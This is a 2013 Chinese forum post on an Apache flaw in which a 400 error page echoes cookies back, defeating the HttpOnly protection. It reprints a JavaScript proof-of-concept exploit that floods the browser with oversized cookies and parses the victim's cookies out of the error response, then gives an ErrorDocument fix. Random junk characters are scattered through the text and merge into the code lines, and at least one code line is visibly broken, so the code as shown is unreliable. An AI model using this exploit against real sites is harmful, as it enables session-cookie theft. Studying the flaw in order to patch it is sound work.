很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。+ Z( T8 h* }+ V7 }( D
5 [5 j& i3 R- f. E4 W a
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
/ N6 U7 |: q3 S6 | $ j0 p S! I# S2 l# S1 ^" v5 W
& F: E$ s- x. g% X9 v. o3 D& q- ^
// http://www.exploit-db.com/exploits/18442/
. U6 _) j2 q ?$ g# K# ]5 afunction setCookies (good) {3 ?5 T- t7 c% y! J5 C
// Construct string for cookie value8 l3 g8 l5 p% N# k9 n1 {$ @6 G
var str = "";
) \& `5 ~7 ^. [4 ?+ Wfor (var i=0; i< 819; i++) {3 h k: `4 e9 [: d p+ l2 A
str += "x";
1 w5 M y, H9 J* r# T p) G9 @; b" A}+ a" i- @# r/ a. S3 ?2 _- I
// Set cookies8 |, V/ s8 ?- G
for (i = 0; i < 10; i++) {: }7 O( N. N$ ?" e* C5 j }" a+ N2 I
// Expire evil cookie
T3 o1 M* y( V0 ~$ ]: I' iif (good) {5 ?, j# A M( L/ k5 i
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";; g( n( K7 ~. r/ d, [
}! `% w, q y2 @" O R7 a, E
// Set evil cookie' @; u' S/ U' t h0 a+ o) r1 q. ]4 H
else {
* C0 t5 P3 A- k, {- i. t4 Avar cookie = "xss"+i+"="+str+";path=/";' T1 G- Z/ T6 h6 D
}
$ Z8 g( B3 A7 q" r. v% E8 p8 udocument.cookie = cookie;
; }" S6 U3 Z- [- u}( N+ l9 `7 k. B, P" b+ G; L* ^' w: Y
}; U6 f7 G6 o8 c$ ^# ?4 f+ c
function makeRequest() {
: f2 o$ [" k9 v& p- Q, |8 ]setCookies();$ F. [( t& U' Y# P, G/ s
function parseCookies () {0 X& Z; \0 e; i Z7 T( k0 h
var cookie_dict = {};4 c9 [5 N$ X7 ]6 X& J( X$ V9 p1 N
// Only react on 400 status! i2 b4 Z- Z- T
if (xhr.readyState === 4 && xhr.status === 400) {
; Z. d1 n/ g" b: R0 T// Replace newlines and match <pre> content. f# g/ ~8 _7 r+ f1 f5 l; ^! X9 F
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
# i" b0 B8 C2 i& D; X8 Xif (content.length) {" `2 W; q& r! U4 t; S6 N: w
// Remove Cookie: prefix/ p6 y7 H( I5 ?8 p: @6 \
content = content[1].replace("Cookie: ", "");
# z Q6 q, Q! }' ? D% cvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
% Q: Q' k& {4 a; f// Add cookies to object
7 E: g$ g. O O* h* \$ Cfor (var i=0; i<cookies.length; i++) { @1 ]* i# ?8 K% [9 Z" s: n
var s_c = cookies.split('=',2);7 m) k+ W' ?6 y; F6 a6 S. t
cookie_dict[s_c[0]] = s_c[1];8 w9 `. e" c1 h
} R+ b( n' d, A! e
}
p% X) V9 z/ |- ?// Unset malicious cookies4 E0 y6 T& H6 ]' g
setCookies(true);
3 {3 l5 M( v/ Y2 Ralert(JSON.stringify(cookie_dict));$ f5 K( ?8 A& V6 d( n5 g
}6 x& w: t% T* w j7 Z, j- N7 ]6 L
}& p" ~) a& w9 I3 S9 W
// Make XHR request4 b! Y5 ?6 v) o- I: M6 K9 f' h
var xhr = new XMLHttpRequest();
; o0 T6 e9 L5 o1 txhr.onreadystatechange = parseCookies;
# @( Y4 D) n- O8 }' Wxhr.open("GET", "/", true);) s" L) X6 Z1 q% Z, g+ V$ l1 G; H
xhr.send(null);
w# g, a) |8 P8 q' n4 h" S}+ M0 E: Z" L, S3 j* n) p
makeRequest();" W; |1 c& q6 N( A
6 x( d7 s5 V Z4 M/ |
你就能看见华丽丽的400错误包含着cookie信息。
~) Y# ?, {% ^1 o
. H2 y2 [2 X3 T. v' i下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#- C0 `( `/ G& R0 o6 h2 L
5 l+ A3 E" a& B5 R8 J
修复方案:
% i. h6 q& C/ _; B5 v
% S$ L& Z( ?" ?) r n. `8 fApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下& n& y. N/ r8 s
, e# z; V0 K/ D2 C2 K. w: ?! gIn the event of a problem or error, Apachecan be configured to do one of four things,1 i9 G, N9 c0 L7 |5 g
; r5 E0 Z: {) V* [
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息: ?+ {/ k% X$ l- ?/ E B
2. output acustomized message输出一段信息
9 e- X( d2 V4 g( L) z3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
# E [! G4 P- v( s4. redirect to an external URL to handle theproblem/error转向一个外部URL c! E/ C9 S/ R& g
0 {3 {/ i/ B8 R/ l! H+ E- p; I: x经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容+ S$ {- I% j# k
( a7 k4 {2 s; C8 k$ j, XApache配置:
1 r- w2 h0 `3 B7 j* Q
5 Y6 Q) C8 O+ G k3 U5 j+ ]( sErrorDocument400 " security test"$ M/ d \2 f4 G7 o
. `0 @: \' N: r% {4 D3 ]
当然,升级apache到最新也可:)。3 a5 d0 f# \. g3 c; B2 ~# J
& i B+ t9 I) h3 w8 u- E' x
参考:http://httpd.apache.org/security/vulnerabilities_22.html
( b) S( e! e/ y% [0 L- [5 V1 t5 E! D2 R; |
|
发表于 2013-4-19 19:15:43
收藏
支持
反对